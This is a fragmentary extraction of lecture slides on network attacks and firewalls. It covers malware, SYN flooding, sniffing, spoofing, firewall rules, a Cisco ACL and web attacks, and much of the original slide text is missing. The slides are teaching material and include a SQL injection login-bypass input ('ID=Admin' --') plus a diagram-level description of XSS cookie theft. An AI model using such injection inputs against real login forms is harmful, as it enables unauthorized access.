Академический Документы
Профессиональный Документы
Культура Документы
References
Computer Networking: A Top Down Approach ,Chapters 1 and 8, 4th edition. Jim Kurose, Keith Ross, Addison-Wesley, July 2007. ICCL-
Outline
Network Attacks Introduction of Firewall Firewall Products
Malware (1/2)
Spyware
Infection by downloading web page with spyware Records keystrokes, web sites visited, upload info to collection site
Virus
Infection by receiving object (e.g., e-mail attachment), actively executing Self-replicating: propagate itself to other hosts, users
Worm
Infection by passively receiving object that gets itself executed Self-replicating
7
Malware (2/2)
Trojan horse
BirdSpy: made in Taiwan Restore OS Used for DDoS
Mail bomb
SPAM
SY N =1 Seq = 2000
Step 1: client host sends TCP SYN segment to server specifies initial seq # no data Step 2: server host receives SYN, replies with SYNACK segment
SY N =1,A C K =1 Seq = 4000 A C K # = 2001 Wi ndow si ze
server allocates buffers specifies server initial seq. # Step 3: client receives SYN/ACK, replies with ACK segment, which may contain data
11
select target
around the network (see malware) 3. send packets toward target from compromised hosts
target
12
Packet Sniffing
Promiscuous network interface reads & records all packets passing by
Accept all broadcast media Wireshark (Ethereal) is a packet-sniffer! Sniff, modify, deletion your packets
Alice C
src:B dest:A
payload
Bob
1-13
IP Spoofing
Send packet with false source address Require end-point authentication
A C
src:B dest:A payload
14
B
15
B
16
ow to Provide Security?
More throughout this course Cryptographic techniques: obvious uses and not so obvious uses Firewall
1-17
18
Firewalls
To isolate organizations internal network from Internet, allowing some packets to pass, blocking others.
Internet
administered network firewall
19
public Internet
router
IP
20
Goals of Firewalls
Prevent denial of service attacks
SYN flooding: attacker establishes many bogus TCP connections, no resources left for real connections
Types of Firewalls
Three types of firewalls:
Stateless packet filters Stateful packet filters Application gateways
22
24
Firewall Setting
Drop all outgoing packets to any IP address, port 80 Drop all incoming TCP SYN packets to any IP except 130.207.244.203, port 80 Drop all incoming UDP packets except DNS and router broadcasts. Drop all ICMP packets going to a broadcast address (eg 130.207.255.255). Drop all outgoing ICMP TTL expired traffic
25
ACK
-----all 26
TCP
Source IP: 150.23.23.155 Destination IP: 222.22.0.2 Source port:80 Destination port:12543
27
connection setup (SYN), teardown (FIN): can determine whether incoming, outgoing packets makes sense m Timeout inactive connections at firewall: no longer admit packets m ACL augmented to indicate need to check connection state table before admitting packet
Source IP: 150.23.23.155 Destination IP: 222.22.0.2 Source port:80 Destination port:12543
28
R2(config)#access-list 21 deny host 211.21.160.12 R2(config)#access-list 21 permit any R2(config)#interface serial 1 R2(config-if)#ip access-group 21 in 10.5.3.0/24 any= 0.0.0.0 255.255.255.255 deny ip any any host
s1
R2
S1 S0
R1
e0
TCP
80
> 1023
ACK
allow allow
UDP
> 1023
53
---
UDP
53
> 1023
----
deny
all
all
all
all
all
8-30
Application Gateways
Filters packets on application data as well as on IP/TCP/UDP fields.
host-to-gateway telnet session
application gateway
31
Comparison
Stateless/stateful filters
Operates on TCP/IP headers only No correlation check among sessions
Application gateways
Detect the application data Intrusion detection system (IDS)
Detect and alert if something wrong
Multiple IDSs
Different types of checking at different locations
application gateway firewall
DNS server
demilitarized zone
35
37
38
Firewalls
To isolate organizations internal network from Internet, allowing some packets to pass, blocking others.
Internet
administered network firewall
39
public Internet
Products
General firewall IDS, IPS Mail firewall Web Application Firewall (WAF)
40
Mail Firewall
Anti-virus Anti-spam
41
(A1)
Javascript
SQL
(A2) Web
4 Web 5 (A2)
42
Normal Connection
ID=A123456789 Passwd=1234
43
ID=Admin' -Passwd=1234
44
45
XSS Case 1:
XSS
cookie
Hackers Computer
cookies
XSS
46
XSS Case 2:
XSS
. Hackers Computer
XSS
domain
47
Hackers Server
48
49
Summary
Firewall firewall log
50
IDS IPS ?
MIS